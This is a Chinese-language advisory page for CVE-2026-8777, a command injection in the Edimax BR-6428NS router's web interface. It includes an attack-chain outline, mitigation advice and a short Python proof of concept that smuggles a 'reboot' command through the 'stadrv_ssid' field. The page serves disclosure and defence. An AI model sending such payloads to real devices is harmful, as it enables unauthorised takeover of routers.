IPBUF安全漏洞报告
English
CVE-2026-8777 CVSS 6.3 中危

CVE-2026-8777 Edimax路由器命令注入漏洞

披露日期: 2026-05-18
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-8777
漏洞类型
命令注入
CVSS评分
6.3 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
Edimax BR-6428NS

相关标签

命令注入RCEIoTEdimax路由器

漏洞概述

Edimax BR-6428NS v1.10 版本的 Web 管理接口存在操作系统命令注入漏洞。该漏洞位于 /goform/formStaDrvSetup 组件的 POST 请求处理函数中。由于未对用户提交的 'stadrv_ssid' 参数进行严格的过滤,攻击者可构造恶意数据包,在受影响设备上远程执行任意系统命令。目前该漏洞利用细节已公开,且厂商尚未做出响应。

技术细节

该漏洞源于 Edimax BR-6428NS 固件在处理站点驱动配置请求时存在输入验证缺失。具体位于 /goform/formStaDrvSetup 接口,当组件接收包含 'stadrv_ssid' 参数的 POST 请求时,直接将其值传递给底层的系统 Shell 执行环境,未进行任何安全清洗或转义。攻击者可以通过在参数值中插入 Shell 元字符(如分号 ';'、管道符 '|' 或反引号 '`'),将原本的配置命令截断并拼接恶意指令。由于 CVSS 评分中权限要求为低(PR:L),攻击者通常需要具备基本的 Web 管理权限(如使用默认凭据登录),但在某些配置不当的情况下可能未授权利用。

攻击链分析

STEP 1
1. 信息收集
攻击者扫描网络,识别出 Edimax BR-6428NS 设备及其固件版本。
STEP 2
2. 获取访问权限
由于 CVSS PR:L,攻击者猜测或暴力破解 Web 管理员密码,登录管理界面获取 Cookie 或 Session Token。
STEP 3
3. 漏洞利用
攻击者向 /goform/formStaDrvSetup 发送特制的 POST 请求,在 'stadrv_ssid' 参数中注入恶意 Shell 命令(如下载后门或开启 Telnet)。
STEP 4
4. 执行命令
服务器端未过滤参数,直接执行系统命令,攻击者获得设备控制权。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target URL (replace with actual IP) target_url = "http://192.168.1.1/goform/formStaDrvSetup" # The vulnerable parameter # Payload example: Reboot command injection # Using ';' to separate commands in shell malicious_ssid = "wifi_name; reboot;" # Data to be sent in the POST request payload_data = { "stadrv_ssid": malicious_ssid, # Other required parameters might be needed depending on the form structure } try: # Sending the request (cookies may be required for authentication) response = requests.post(target_url, data=payload_data, timeout=5) if response.status_code == 200: print("[+] Payload sent successfully.") print("[+] Check if the device rebooted or command executed.") else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[-] An error occurred: {e}")

影响范围

Edimax BR-6428NS 1.10

防御指南

临时缓解措施
如果无法立即升级固件,建议通过 ACL 规则限制对路由器管理界面的访问来源 IP,仅信任的内网设备可访问;同时关闭不必要的远程管理功能(如 Telnet, UPnP 等),并定期检查日志是否存在异常的配置修改记录。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表